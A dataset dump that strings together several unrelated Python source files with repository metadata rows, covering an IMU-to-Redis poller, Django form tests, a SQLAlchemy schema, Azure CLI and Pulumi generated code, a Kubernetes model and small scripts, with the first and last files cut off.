    Returns the updated call counter; the counter is unchanged when no IMU
    sample was available.
    """
    if not imu.IMURead():
        return counter
    timestamp = time.time()
    fusion = imu.getFusionData()
    # Throttle publishing: only every 20th successful read goes to Redis.
    if counter % 20 == 0:
        sample = {
            "hostname": hostname,
            "i_utc": round(timestamp, 2),
            "roll": round(math.degrees(fusion[0]), 1),
            "pitch": round(math.degrees(fusion[1]), 1),
        }
        redis_connection.publish("imu", json.dumps(sample))
    return counter + 1
if __name__ == "__main__":
counter = 0
while True:
counter = poll_imu(counter)
time.sleep(poll_interval / 1e3)
| 24.587302
| 68
| 0.672046
|
acff644ffa6634f204877086a03c7e8b4d2271b4
| 3,032
|
py
|
Python
|
tests/applications/test_forms.py
|
crydotsnake/djangogirls
|
0e764294085d6d7d3c4f61a7fe36f91640abedcd
|
[
"BSD-3-Clause"
] | 446
|
2015-01-04T20:58:26.000Z
|
2022-03-30T23:08:26.000Z
|
tests/applications/test_forms.py
|
serenasensini/TheRedCode_Docker-per-Django-e-Postgres
|
78a2ca1f09ab956a6936d14a5fd99336ff39f472
|
[
"BSD-3-Clause"
] | 649
|
2015-01-09T23:42:14.000Z
|
2022-03-31T17:27:19.000Z
|
tests/applications/test_forms.py
|
serenasensini/TheRedCode_Docker-per-Django-e-Postgres
|
78a2ca1f09ab956a6936d14a5fd99336ff39f472
|
[
"BSD-3-Clause"
] | 319
|
2015-01-06T20:58:42.000Z
|
2022-03-30T06:29:04.000Z
|
import pytest
import vcr
from applications.forms import ApplicationForm
from applications.models import Application, Form, Question
from core.models import Event
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_prevent_duplicate_emails():
    """A second application with the same e-mail must fail validation."""
    event = Event.objects.create(
        name='Test', city='Test', country='Test',
        is_page_live=True, page_url='test'
    )
    form = Form.objects.create(event=event)

    # Override default questions, we need just the e-mail
    form.question_set.all().delete()
    question = Question.objects.create(
        title="Your e-mail address:",
        question_type="email",
        form=form,
        order=1
    )

    assert Application.objects.count() == 0
    # The recaptcha check is replayed from the vcr cassette above.
    form_data = {
        'newsletter_optin': 'yes',
        'g-recaptcha-response': 'PASSED',
        f'question_{question.pk}': 'test@test.pl'
    }
    application_form = ApplicationForm(form_data, form=form)
    assert application_form.is_valid()
    application_form.save()

    assert Application.objects.count() == 1
    application = Application.objects.get()
    assert application.newsletter_optin is True

    # Resubmitting the very same e-mail must be rejected.
    application_form = ApplicationForm(form_data, form=form)
    assert not application_form.is_valid()
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_no_newsletter():
    """Opting out of the newsletter persists newsletter_optin=False."""
    event = Event.objects.create(
        name='Test', city='Test', country='Test',
        is_page_live=True, page_url='test')
    form = Form.objects.create(event=event)

    # Override default questions, we need just the e-mail
    form.question_set.all().delete()
    question = Question.objects.create(
        title="Your e-mail address:",
        question_type="email",
        form=form,
        order=1)

    assert Application.objects.count() == 0
    # 'no' in the submitted data must map to a False boolean on the model.
    form_data = {
        'newsletter_optin': 'no',
        'g-recaptcha-response': 'PASSED',
        f'question_{question.pk}': 'test@test.pl'
    }
    application_form = ApplicationForm(form_data, form=form)
    assert application_form.is_valid()
    application_form.save()

    assert Application.objects.count() == 1
    application = Application.objects.get()
    assert application.newsletter_optin is False
@pytest.mark.django_db
@vcr.use_cassette('tests/applications/vcr/application_form_prevent_duplicate_emails.yaml')
def test_application_form_no_questions():
    """A form without any questions still validates a bare submission."""
    event = Event.objects.create(
        name='Test', city='Test', country='Test',
        is_page_live=True, page_url='test')
    form = Form.objects.create(event=event)

    # Override default questions, we need just the e-mail
    form.question_set.all().delete()

    assert Application.objects.count() == 0
    form_data = {
        'newsletter_optin': 'yes',
        'g-recaptcha-response': 'PASSED'
    }
    application_form = ApplicationForm(form_data, form=form)
    assert application_form.is_valid()
| 30.32
| 90
| 0.697559
|
acff64bbd68dc318b01578e2bfb76fe0c7669778
| 836
|
py
|
Python
|
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
cryptkeeper/db/schema/smithandcrown.py
|
CMoncur/cryptkeeper
|
ed4d1da68b51b817fa8fe29a31901a150f13dfcd
|
[
"MIT"
] | null | null | null |
# pylint: disable=R0903
"""Smith and Crown SqlAlchemy Schema"""
from datetime import datetime
from sqlalchemy import Column, Integer, String, TEXT, TIMESTAMP
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class SmithAndCrown(Base):
    """Smith and Crown Schema: one row per tracked ICO/token sale."""
    __tablename__ = "smithandcrown"

    # Surrogate primary key.
    id = Column( Integer, primary_key = True, autoincrement = True )
    # Row creation timestamp, defaulted at insert time.
    created = Column( TIMESTAMP, nullable = False, default = datetime.now )
    # Project name; must be unique across rows.
    name = Column( String(100), nullable = False, unique = True )
    # Sale start/end timestamps.
    start = Column( TIMESTAMP, nullable = False )
    end = Column( TIMESTAMP, nullable = False )
    # Project website URL.
    site = Column( String(200), nullable = False )
    description = Column( TEXT, nullable = False )
    # Nullable -- presumably unknown until the sale completes (unverified).
    raised = Column( Integer, nullable = True )
    token_symbol = Column( String(20), nullable = False )
| 34.833333
| 73
| 0.722488
|
acff64ecc0ad4bde42b2c82635e0d7863eb1eac4
| 397
|
py
|
Python
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 17
|
2019-10-07T15:10:58.000Z
|
2022-01-21T14:18:07.000Z
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 222
|
2019-10-07T15:04:51.000Z
|
2022-03-24T12:14:16.000Z
|
nablapps/events/migrations/0006_remove_event_view_counter.py
|
Amund211/nablaweb
|
8105c34615d4b67637e982545fbc6489a131c1f3
|
[
"MIT"
] | 7
|
2019-10-10T18:53:42.000Z
|
2021-10-18T02:13:09.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-26 13:50
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the ``view_counter`` field from the events.Event model."""

    dependencies = [
        ("events", "0005_auto_20171017_0110"),
    ]

    operations = [
        migrations.RemoveField(
            model_name="event",
            name="view_counter",
        ),
    ]
| 19.85
| 48
| 0.617128
|
acff6594689f05ecaca9ecced1976f55b71c2023
| 5,601
|
py
|
Python
|
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 9
|
2022-03-25T19:35:49.000Z
|
2022-03-31T06:09:47.000Z
|
src/dataprotection/azext_dataprotection/generated/commands.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | 1
|
2022-03-10T22:13:02.000Z
|
2022-03-10T22:13:02.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=bad-continuation
# pylint: disable=line-too-long
from azure.cli.core.commands import CliCommandType
from azext_dataprotection.generated._client_factory import (
cf_backup_vault,
cf_backup_policy,
cf_backup_instance,
cf_recovery_point,
cf_job,
cf_restorable_time_range,
)
# CliCommandType descriptors: each binds a command group to its generated
# SDK operations class (via operations_tmpl) and its client factory.
dataprotection_backup_vault = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_vaults_operations#BackupVaultsOperations.{}',
    client_factory=cf_backup_vault,
)


dataprotection_backup_policy = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_policies_operations#BackupPoliciesOperations.{}',
    client_factory=cf_backup_policy,
)


dataprotection_backup_instance = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._backup_instances_operations#BackupInstancesOperations.{}',
    client_factory=cf_backup_instance,
)


dataprotection_recovery_point = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._recovery_points_operations#RecoveryPointsOperations.{}',
    client_factory=cf_recovery_point,
)


dataprotection_job = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._jobs_operations#JobsOperations.{}',
    client_factory=cf_job,
)


dataprotection_restorable_time_range = CliCommandType(
    operations_tmpl='azext_dataprotection.vendored_sdks.dataprotection.operations._restorable_time_ranges_operations#RestorableTimeRangesOperations.{}',
    client_factory=cf_restorable_time_range,
)
def load_command_table(self, _):
    """Register all `az dataprotection` command groups and their commands.

    All commands dispatch to `dataprotection_*` custom implementations;
    long-running operations expose --no-wait via supports_no_wait.
    """
    with self.command_group(
        'dataprotection backup-vault', dataprotection_backup_vault, client_factory=cf_backup_vault
    ) as g:
        g.custom_show_command('show', 'dataprotection_backup_vault_show')
        g.custom_command('create', 'dataprotection_backup_vault_create', supports_no_wait=True)
        g.custom_command('update', 'dataprotection_backup_vault_update', supports_no_wait=True)
        g.custom_command('delete', 'dataprotection_backup_vault_delete', confirmation=True)
        g.custom_wait_command('wait', 'dataprotection_backup_vault_show')

    with self.command_group(
        'dataprotection backup-policy', dataprotection_backup_policy, client_factory=cf_backup_policy
    ) as g:
        g.custom_command('list', 'dataprotection_backup_policy_list')
        g.custom_show_command('show', 'dataprotection_backup_policy_show')
        g.custom_command('create', 'dataprotection_backup_policy_create')
        g.custom_command('delete', 'dataprotection_backup_policy_delete', confirmation=True)

    with self.command_group(
        'dataprotection backup-instance', dataprotection_backup_instance, client_factory=cf_backup_instance
    ) as g:
        g.custom_command('list', 'dataprotection_backup_instance_list')
        g.custom_show_command('show', 'dataprotection_backup_instance_show')
        g.custom_command('create', 'dataprotection_backup_instance_create', supports_no_wait=True)
        g.custom_command('delete', 'dataprotection_backup_instance_delete', supports_no_wait=True, confirmation=True)
        g.custom_command('adhoc-backup', 'dataprotection_backup_instance_adhoc_backup', supports_no_wait=True)
        g.custom_command('restore trigger', 'dataprotection_backup_instance_restore_trigger', supports_no_wait=True)
        g.custom_command('resume-protection', 'dataprotection_backup_instance_resume_protection', supports_no_wait=True)
        g.custom_command('stop-protection', 'dataprotection_backup_instance_stop_protection', supports_no_wait=True)
        g.custom_command('suspend-backup', 'dataprotection_backup_instance_suspend_backup', supports_no_wait=True)
        g.custom_command(
            'validate-for-backup', 'dataprotection_backup_instance_validate_for_backup', supports_no_wait=True
        )
        g.custom_command(
            'validate-for-restore', 'dataprotection_backup_instance_validate_for_restore', supports_no_wait=True
        )
        g.custom_wait_command('wait', 'dataprotection_backup_instance_show')

    with self.command_group(
        'dataprotection recovery-point', dataprotection_recovery_point, client_factory=cf_recovery_point
    ) as g:
        g.custom_command('list', 'dataprotection_recovery_point_list')
        g.custom_show_command('show', 'dataprotection_recovery_point_show')

    with self.command_group('dataprotection job', dataprotection_job, client_factory=cf_job) as g:
        g.custom_command('list', 'dataprotection_job_list')
        g.custom_show_command('show', 'dataprotection_job_show')

    with self.command_group(
        'dataprotection restorable-time-range',
        dataprotection_restorable_time_range,
        client_factory=cf_restorable_time_range,
    ) as g:
        g.custom_command('find', 'dataprotection_restorable_time_range_find')

    # Marks the whole extension as experimental in `az` help output.
    with self.command_group('dataprotection', is_experimental=True):
        pass
| 46.675
| 152
| 0.764328
|
acff66604b8ef3e02411c18993d0a43944f3dec8
| 2,359
|
py
|
Python
|
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | null | null | null |
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | null | null | null |
src/crop_head_bbox.py
|
anhnt170489/FunMOT
|
6eb794bd485be42270eaee3804e13d38a897a945
|
[
"MIT"
] | 1
|
2021-11-09T02:50:19.000Z
|
2021-11-09T02:50:19.000Z
|
import os
import argparse
import cv2
from tqdm import tqdm
import numpy as np
import traceback
def convert_full_to_head(bbox, h, w):
    """Rewrite full-body boxes as head-region boxes, in place.

    ``bbox`` is an (N, 6) array whose columns 3/4/5 hold normalized
    center-y, width and height (assumes YOLO-style normalized labels —
    TODO confirm against the annotation format). The head box keeps the
    original width; its height becomes the width scaled by the image
    aspect ratio ``w/h`` so the crop stays square in pixels, and its
    center is moved to the top of the original box.

    Returns the same array object for call-chaining.
    """
    aspect = w / h
    center_y = bbox[:, 3]
    box_w = bbox[:, 4]
    box_h = bbox[:, 5]
    # New center sits half a (scaled) head-height below the old top edge.
    bbox[:, 3] = center_y - box_h / 2 + box_w * aspect / 2
    bbox[:, 5] = box_w * aspect
    return bbox
if __name__ == "__main__":
    # CLI: walk a folder of full-body annotation files, convert every box to a
    # head-region box, and mirror the directory tree under --out.
    parser = argparse.ArgumentParser("Convert Full body annotation to head-shoulder annotation")
    parser.add_argument('--full', type=str, required=True, help="Folder contain body annotation")
    parser.add_argument('--image', type=str, help="Folder contain images")
    parser.add_argument('--image_ext', type=str, default="jpg", help="Image extension")
    parser.add_argument('--height', type=int, help="Image height if constant")
    parser.add_argument('--width', type=int, help="Image width if constant")
    parser.add_argument('--out', type=str, required=True, help="Output annotation for cropped head")
    args = parser.parse_args()
    # Frame size must be known: either a constant --height/--width pair or an
    # --image folder to read each frame's size from.
    assert args.image is not None or (args.height is not None and args.width is not None)
    if not os.path.isdir(args.out):
        os.makedirs(args.out)
    try:
        for root, dirs, files in tqdm(os.walk(args.full)):
            # relpath depends only on root — hoisted out of the inner loops
            # (the original recomputed it once per subdirectory and per file).
            relpath = os.path.relpath(root, args.full)
            for dirname in dirs:
                # Mirror the input directory tree under the output folder.
                outfolder = os.path.join(args.out, relpath, dirname)
                if not os.path.isdir(outfolder):
                    os.makedirs(outfolder)
            for filename in files:
                # reshape((-1, 6)) keeps single-row label files 2-D.
                gt = np.loadtxt(os.path.join(root, filename)).reshape((-1, 6))
                if args.height is None or args.width is None:
                    # Read the matching image to obtain this frame's size.
                    img_path = os.path.splitext(filename)[0] + "." + args.image_ext
                    img_path = os.path.join(args.image, relpath, img_path)
                    img = cv2.imread(img_path)
                    h, w = img.shape[:2]
                else:
                    h = args.height
                    w = args.width
                head = convert_full_to_head(gt, h, w)
                np.savetxt(os.path.join(args.out, relpath, filename), head, fmt='%d %d %.6f %.6f %.6f %.6f')
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit; still best-effort — report the failure and exit cleanly.
        # print(root, dirname, filename)
        # print(img_path)
        traceback.print_exc()
| 35.208955
| 108
| 0.578211
|
acff68bc0100ce10fd240863497f835f746bd780
| 75
|
py
|
Python
|
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | null | null | null |
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | null | null | null |
udemy/python-video-workbook/my_progress/019.py
|
djrgit/coursework
|
2a91da9b76cb1acbd12f3d8049f15d2e71f475a1
|
[
"MIT"
] | 3
|
2018-08-13T23:14:22.000Z
|
2019-01-11T22:50:07.000Z
|
# Exercise 19 - Add Dictionary Key
# Build the dict with keyword arguments, then add the new key via update().
d = dict(a=1, b=2)
d.update(c=3)
print(d)
| 18.75
| 34
| 0.533333
|
acff69da4e5a35b9943277a3d65ea8075b119b9e
| 287
|
py
|
Python
|
torch/_lazy/config.py
|
lkct/pytorch
|
ec62901a2c38b63d12843e0f079bdeb7644d8714
|
[
"Intel"
] | 1
|
2022-02-01T18:50:09.000Z
|
2022-02-01T18:50:09.000Z
|
torch/_lazy/config.py
|
ellhe-blaster/pytorch
|
e5282c3cb8bf6ad8c5161f9d0cc271edb9abed25
|
[
"Intel"
] | null | null | null |
torch/_lazy/config.py
|
ellhe-blaster/pytorch
|
e5282c3cb8bf6ad8c5161f9d0cc271edb9abed25
|
[
"Intel"
] | null | null | null |
import torch._C._lazy
def get_force_fallback():
    """Get the config used to force LTC fallback.

    Returns:
        The current force-fallback setting as reported by the
        ``torch._C._lazy`` C++ binding (value semantics are defined there).
    """
    return torch._C._lazy._get_force_fallback()
def set_force_fallback(configval):
    """Set the config used to force LTC fallback.

    Args:
        configval: Passed straight through to the ``torch._C._lazy``
            binding; no validation is performed on the Python side.
    """
    torch._C._lazy._set_force_fallback(configval)
| 28.7
| 51
| 0.745645
|
acff6af186427d83aa1eead205283923331384c2
| 658
|
py
|
Python
|
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
Python/hourCmp.py
|
jayyok/ensiie-P
|
6739c8478a0631c4c0966aad74d379df12e0bada
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
def timeCmp(h1, m1, s1, h2, m2, s2):
    """Print the signed difference between two clock times, as H:M:S.

    The difference is (h2:m2:s2) - (h1:m1:s1). A positive difference prints
    'Resultat :H:M:S:'; a zero or negative one prints 'Resultat : - H:M:S:'.

    Bug fixed: the original formatted the *negative* number of seconds
    directly, producing a doubled minus sign and — because of Python's
    floor-style modulo on negatives — wrong minute/second components.
    We now format the absolute value and keep the '- ' marker.
    """
    t1 = h1 * 3600 + m1 * 60 + s1
    t2 = h2 * 3600 + m2 * 60 + s2
    diff = t2 - t1
    # Decompose the magnitude into H/M/S; divmod avoids float division.
    hh, rem = divmod(abs(diff), 3600)
    mm, ss = divmod(rem, 60)
    if diff > 0:
        print('Resultat :' + str(hh) + ':' + str(mm) + ':' + str(ss) + ':')
    else:
        print('Resultat : - ' + str(hh) + ':' + str(mm) + ':' + str(ss) + ':')
# Read two times from stdin, six integers, one per line: H1 M1 S1 H2 M2 S2.
h1, m1, s1 = int(input()), int(input()), int(input())
h2, m2, s2 = int(input()), int(input()), int(input())
print(f'H1{h1}:{m1}:{s1}')
print(f'H2{h2}:{m2}:{s2}')
# Compare the two times defined above
timeCmp(h1, m1, s1, h2, m2, s2)
| 23.5
| 114
| 0.527356
|
acff6c396b326795277b3c8874f4552b02278335
| 391
|
py
|
Python
|
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | 6
|
2015-03-19T15:14:52.000Z
|
2018-09-30T05:03:16.000Z
|
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | null | null | null |
books/mylibrary/grids.py
|
agiliq/django-datagrid
|
0ab533b93f014b8fba6e9c4daddbcd5b7f31b9c9
|
[
"MIT"
] | 8
|
2015-02-13T02:31:48.000Z
|
2021-11-11T20:36:46.000Z
|
from datagrid.grids import DataGrid, Column, NonDatabaseColumn
class SimpleGrid(DataGrid):
    """Minimal grid: a single computed (non-database) column."""
    name = NonDatabaseColumn("Hello")
class RealGrid(DataGrid):
    """Grid with three plain columns (presumably mapping to model
    fields of the grid's queryset — confirm in datagrid.grids)."""
    name = Column()
    publisher = Column()
    recommended_by = Column()
class SortableGrid(DataGrid):
    """Same columns as RealGrid, but each one opts into user sorting."""
    name = Column(sortable = True)
    publisher = Column(sortable = True)
    recommended_by = Column(sortable = True)
| 26.066667
| 62
| 0.703325
|
acff6c59c6c17490d7dad60940c58bec29e9b5ee
| 437
|
py
|
Python
|
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
World 2/Exercise 60.py
|
NikiReis/Python--Exercises
|
2f50a3cd6900cec024edcf1a812d1cd86afcdea1
|
[
"MIT"
] | null | null | null |
# Exercise 60 - factorial, two ways.
# first option: iterative loop.
# Bug fixed: the original multiplied into `number` starting from the input
# itself, so an input of 0 printed "factorial of 0 is: 0" (0! is 1).
# Accumulating into a separate `result` initialized to 1 handles 0 and 1.
number = int(input("Type a value to calcule the factorial: "))
position = number
result = 1
while number > 1:
    result *= number
    number -= 1
print("The factorial of {} is: {}".format(position, result))
# second option: the standard library does it in one call.
from math import factorial
number = int(input("Type a value to calcule the factorial: "))
result = factorial(number)
print("The factorial of {} is: {}".format(number, result))
| 21.85
| 62
| 0.675057
|
acff6d8930e882dde3c7ed109a66ff940dc3447b
| 5,855
|
py
|
Python
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 2
|
2021-03-09T12:42:05.000Z
|
2021-03-09T13:27:50.000Z
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 7
|
2021-04-13T03:04:42.000Z
|
2022-03-02T03:10:18.000Z
|
kubernetes/client/models/v1alpha1_non_resource_policy_rule.py
|
carloscastrojumo/python
|
f461dd42d48650a4ae1b41d630875cad9fcb68ad
|
[
"Apache-2.0"
] | 1
|
2021-06-13T09:21:37.000Z
|
2021-06-13T09:21:37.000Z
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.17
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha1NonResourcePolicyRule(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Python attribute name -> OpenAPI type string.
    openapi_types = {
        'non_resource_ur_ls': 'list[str]',
        'verbs': 'list[str]'
    }

    # Python attribute name -> JSON key used on the wire.
    attribute_map = {
        'non_resource_ur_ls': 'nonResourceURLs',
        'verbs': 'verbs'
    }

    def __init__(self, non_resource_ur_ls=None, verbs=None, local_vars_configuration=None):  # noqa: E501
        """V1alpha1NonResourcePolicyRule - a model defined in OpenAPI"""  # noqa: E501
        # Fall back to a default client Configuration when none is supplied;
        # it controls whether the setters below enforce required-field checks.
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._non_resource_ur_ls = None
        self._verbs = None
        self.discriminator = None

        # Assign through the properties so setter-side validation runs.
        self.non_resource_ur_ls = non_resource_ur_ls
        self.verbs = verbs

    @property
    def non_resource_ur_ls(self):
        """Gets the non_resource_ur_ls of this V1alpha1NonResourcePolicyRule.  # noqa: E501

        `nonResourceURLs` is a set of url prefixes that a user should have access to and may not be empty. For example: - \"/healthz\" is legal - \"/hea*\" is illegal - \"/hea\" is legal but matches nothing - \"/hea/*\" also matches nothing - \"/healthz/*\" matches all per-component health checks. \"*\" matches all non-resource urls. if it is present, it must be the only entry. Required.  # noqa: E501

        :return: The non_resource_ur_ls of this V1alpha1NonResourcePolicyRule.  # noqa: E501
        :rtype: list[str]
        """
        return self._non_resource_ur_ls

    @non_resource_ur_ls.setter
    def non_resource_ur_ls(self, non_resource_ur_ls):
        """Sets the non_resource_ur_ls of this V1alpha1NonResourcePolicyRule.

        `nonResourceURLs` is a set of url prefixes that a user should have access to and may not be empty. For example: - \"/healthz\" is legal - \"/hea*\" is illegal - \"/hea\" is legal but matches nothing - \"/hea/*\" also matches nothing - \"/healthz/*\" matches all per-component health checks. \"*\" matches all non-resource urls. if it is present, it must be the only entry. Required.  # noqa: E501

        :param non_resource_ur_ls: The non_resource_ur_ls of this V1alpha1NonResourcePolicyRule.  # noqa: E501
        :type: list[str]
        """
        # Required field: reject None when client-side validation is enabled.
        if self.local_vars_configuration.client_side_validation and non_resource_ur_ls is None:  # noqa: E501
            raise ValueError("Invalid value for `non_resource_ur_ls`, must not be `None`")  # noqa: E501

        self._non_resource_ur_ls = non_resource_ur_ls

    @property
    def verbs(self):
        """Gets the verbs of this V1alpha1NonResourcePolicyRule.  # noqa: E501

        `verbs` is a list of matching verbs and may not be empty. \"*\" matches all verbs. If it is present, it must be the only entry. Required.  # noqa: E501

        :return: The verbs of this V1alpha1NonResourcePolicyRule.  # noqa: E501
        :rtype: list[str]
        """
        return self._verbs

    @verbs.setter
    def verbs(self, verbs):
        """Sets the verbs of this V1alpha1NonResourcePolicyRule.

        `verbs` is a list of matching verbs and may not be empty. \"*\" matches all verbs. If it is present, it must be the only entry. Required.  # noqa: E501

        :param verbs: The verbs of this V1alpha1NonResourcePolicyRule.  # noqa: E501
        :type: list[str]
        """
        # Required field: reject None when client-side validation is enabled.
        if self.local_vars_configuration.client_side_validation and verbs is None:  # noqa: E501
            raise ValueError("Invalid value for `verbs`, must not be `None`")  # noqa: E501

        self._verbs = verbs

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialize nested models (anything with a to_dict),
        # lists of models, and dicts whose values are models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, V1alpha1NonResourcePolicyRule):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, V1alpha1NonResourcePolicyRule):
            return True

        return self.to_dict() != other.to_dict()
| 38.267974
| 414
| 0.629547
|
acff6e61fb3af76739b2210c352c27f8d7c6d8b9
| 32,102
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200301/vpn_connection.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VpnConnectionArgs', 'VpnConnection']
# Auto-generated Pulumi input type: every property getter/setter delegates to
# pulumi.get/pulumi.set; optional fields are only stored when supplied.
@pulumi.input_type
class VpnConnectionArgs:
    def __init__(__self__, *,
                 gateway_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 connection_bandwidth: Optional[pulumi.Input[int]] = None,
                 connection_name: Optional[pulumi.Input[str]] = None,
                 dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,
                 enable_bgp: Optional[pulumi.Input[bool]] = None,
                 enable_internet_security: Optional[pulumi.Input[bool]] = None,
                 enable_rate_limiting: Optional[pulumi.Input[bool]] = None,
                 id: Optional[pulumi.Input[str]] = None,
                 ipsec_policies: Optional[pulumi.Input[Sequence[pulumi.Input['IpsecPolicyArgs']]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 remote_vpn_site: Optional[pulumi.Input['SubResourceArgs']] = None,
                 routing_weight: Optional[pulumi.Input[int]] = None,
                 shared_key: Optional[pulumi.Input[str]] = None,
                 use_local_azure_ip_address: Optional[pulumi.Input[bool]] = None,
                 use_policy_based_traffic_selectors: Optional[pulumi.Input[bool]] = None,
                 vpn_connection_protocol_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayConnectionProtocol']]] = None,
                 vpn_link_connections: Optional[pulumi.Input[Sequence[pulumi.Input['VpnSiteLinkConnectionArgs']]]] = None):
        """
        The set of arguments for constructing a VpnConnection resource.
        :param pulumi.Input[str] gateway_name: The name of the gateway.
        :param pulumi.Input[str] resource_group_name: The resource group name of the VpnGateway.
        :param pulumi.Input[int] connection_bandwidth: Expected bandwidth in MBPS.
